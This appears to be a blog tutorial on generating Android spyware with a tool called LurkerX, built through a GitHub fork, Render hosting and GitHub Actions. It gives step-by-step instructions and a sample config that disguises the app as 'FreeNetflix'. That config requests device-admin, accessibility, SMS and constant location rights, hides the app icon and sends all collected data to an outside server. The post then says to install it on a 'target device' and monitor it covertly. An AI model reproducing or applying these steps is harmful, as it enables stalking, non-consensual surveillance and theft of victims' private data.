How to Spy on any Android phone using just Chrome or Safari, October 2026

Did you know that you can spy on any Android Phone using just your browser on your own phone?
LurkerX has been a tool people use to generate spywares for Android devices, but for your information it required a PC like a laptop because that was how it was designed. The recent breakthrough is very surprising, With any device that you are using, you can generate a spyware that can be used to spy on other Android devices. In this post, I would list and explain all that you need to know in spying other Androids using the new LurkerX, so miss no glance if you need to learn how to use the new LurkerX.
- The most neccessary thing to do is to create an account on these two platforms;
It is those platforms I'd use in this tutorial, though many platforms provides similar services.
-
The next thing to do is to log into your GitHub account, and open this repository link:
https://github.com/the-hollowclan/LurkerX -
Fork the repository, step-by-step illustration as shown in the images below:
- Copy the link to your forked repository. For e.g, mine is https://github.com/nooby-jazy/LurkerX
https://github.com/noobie-jayz/LurkerX
-
Now log into your render.com account
-
Create a new
web service
- Choose public git repository and enter the link to your GitHub fork.
- Connect and Choose
FREEinstance plan. Then jump to the bottom and clickDeploy web service
- Render will generate a link for you. Copy the link
-
Go back to your GitHub account. Everything is set, you just need to make sure your generated Spyware would forward all data and information to your Render.com URL.
-
Click on
choices.iniand edit it. Make sure to change things likeremoteUrlandrepo_url.
remoteUrlshould be your link from render.comrepo_urlshould be your forked repo's link. In this case mine ishttps://github.com/nooby-jayz/LurkerX.
You edit this, you edit the spyware behavior.
Don't forget to save it after editing(Also called "Committing" on GitHub)
This is an example of how I made mine:
[app]
name = FreeNetflix
version = 1.6.0
[content]
icon = icon.PNG?raw=true
countdowntext = "Sit tight and relax while the app configures the system for free and fast internet"
[buttons]
requestpermissions = Enable App Process
requestdeviceadmin = Request Core-Level Rights
enableaccessibility = Enable Accessibility Service
[strings]
telephonypermissionstring = Phone and SMS permissions are needed to enable the service
gpspermissionstring = Allow Location for ALL THE TIME to let the app fake your GPS in background. This is required
[behavior]
remoteurl = https://lurkerx-wo5o.onrender.com
payloadurl = None
hideapp = true
[decompile]
from = base.apk
[public]
repo_url= https://github.com/its-ernest/LurkerX
[sign]
keystore = mykey.jks
keystore_pass = password
alias =
- Now open your GitHub Actions, for e.g, mine is
https://github.com/nooby-jayz/LurkerX/actions
-
Choose the latest one, the first one on top.
-
Wait for it to build the malware successfully then scroll to the bottom (Artifacts section)
-
You should see the app built, click on it to download
-
After that install it on the target device you aim to monitor
-
All information on that device can also be viewed on your render.com URL portal.